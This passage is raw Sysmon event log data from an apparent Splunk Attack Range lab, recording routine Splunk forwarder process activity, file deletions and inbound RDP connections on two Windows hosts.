Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{85C0FFC9-B7EC-607E-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{85C0FFC9-B85C-607E-9700-00000000BB01}3076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000049157Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:52:58.829{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=16AFAAF0552D60ECEBB5E2A80FD0BF41,SHA256=5324E5E92B76394D3A985BA9D11D1D0FB8C4A98D72338AE9990D82F8F6B06247,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000049156Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:52:58.704{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=01E299655B7D33FDDD5FE34216A8680C,SHA256=285077FB1691926A7F64A2E2A78D7E45487EC9EAA0277766F17C1D6C837A0935,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000062772Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:52:57.445{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-10403-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 354300x800000000000000062771Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:52:57.408{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-18607-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 23542300x800000000000000062770Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:52:58.692{A7A01FEF-E37F-607E-4D0A-00000000BB01}5988NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=F985E1E51BD4FEB45E4931E1523E80EA,SHA256=E168C793E8F8BB7D1EAC66F2B963AAC5E0DD0FE2CCEBAB9CCFC61E8C70CE4293,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000062769Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:52:58.004{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=238F330C9B7D67D4CF929C1BA89EC9AA,SHA256=925790BF94DE1775DCE868934D5E8A6330E4276AA5D686AA9F70832E384378C5,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000049155Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:52:58.470{85C0FFC9-EACA-607E-CB06-00000000BB01}2724956C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{85C0FFC9-B85C-607E-9700-00000000BB01}3076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000049154Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:52:58.360{85C0FFC9-B85D-607E-9B00-00000000BB01}37722740C:\Windows\system32\conhost.exe{85C0FFC9-EACA-607E-CB06-00000000BB01}2724C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000049153Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:52:58.360{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000049152Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:52:58.360{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000049151Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:52:58.360{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000049150Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:52:58.360{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000049149Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:52:58.360{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000049148Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:52:58.360{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000049147Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:52:58.360{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000049146Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:52:58.360{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000049145Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:52:58.360{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000049144Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:52:58.360{85C0FFC9-B7EC-607E-0500-00000000BB01}416532C:\Windows\system32\csrss.exe{85C0FFC9-EACA-607E-CB06-00000000BB01}2724C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000049143Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:52:58.360{85C0FFC9-B85C-607E-9700-00000000BB01}30763836C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{85C0FFC9-EACA-607E-CB06-00000000BB01}2724C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000049142Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:52:58.361{85C0FFC9-EACA-607E-CB06-00000000BB01}2724C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{85C0FFC9-B7EC-607E-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{85C0FFC9-B85C-607E-9700-00000000BB01}3076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000049161Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:52:59.907{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=E3EDAAF7F3F46A9BF2A7CD136E0E8E42,SHA256=35693D151989FC13CB2F50C6C64F89BACBB319D22D5C9E026F14BA025FD0D35B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000049160Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:52:59.720{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=414BA2A07597FEB548B463DF4C7CDA2C,SHA256=0332BB7E7BDCE920F99ADF094348A005762021DAEB701B1C1B9B52B47A370B3C,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000062783Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:52:58.749{A7A01FEF-E37F-607E-4D0A-00000000BB01}5988C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-339.attackrange.local57434-false10.0.1.12-8089- 10341000x800000000000000062782Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:52:59.192{A7A01FEF-E380-607E-510A-00000000BB01}63405272C:\Windows\system32\conhost.exe{A7A01FEF-EACB-607E-5E0B-00000000BB01}5704C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000062781Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:52:59.192{A7A01FEF-B625-607E-0C00-00000000BB01}6684872C:\Windows\system32\svchost.exe{A7A01FEF-B636-607E-2800-00000000BB01}2560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000062780Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:52:59.192{A7A01FEF-B625-607E-0C00-00000000BB01}6684872C:\Windows\system32\svchost.exe{A7A01FEF-B636-607E-2800-00000000BB01}2560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000062779Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:52:59.192{A7A01FEF-B625-607E-0C00-00000000BB01}6684872C:\Windows\system32\svchost.exe{A7A01FEF-B636-607E-2800-00000000BB01}2560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000062778Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:52:59.192{A7A01FEF-B625-607E-0C00-00000000BB01}6684872C:\Windows\system32\svchost.exe{A7A01FEF-B636-607E-2800-00000000BB01}2560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000062777Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:52:59.192{A7A01FEF-B624-607E-0500-00000000BB01}644660C:\Windows\system32\csrss.exe{A7A01FEF-EACB-607E-5E0B-00000000BB01}5704C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000062776Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:52:59.192{A7A01FEF-E37F-607E-4D0A-00000000BB01}59884344C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{A7A01FEF-EACB-607E-5E0B-00000000BB01}5704C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000062775Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:52:59.193{A7A01FEF-EACB-607E-5E0B-00000000BB01}5704C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A7A01FEF-B624-607E-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{A7A01FEF-E37F-607E-4D0A-00000000BB01}5988C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000062774Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:52:59.082{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=9BECB140DB89A0B5184780ED1BC9EA67,SHA256=0C936A847E7489258E02A998CBE69748F77052EAD6C4086A1ECB968AEF43F9BE,IMPHASH=00000000000000000000000000000000falsetrue 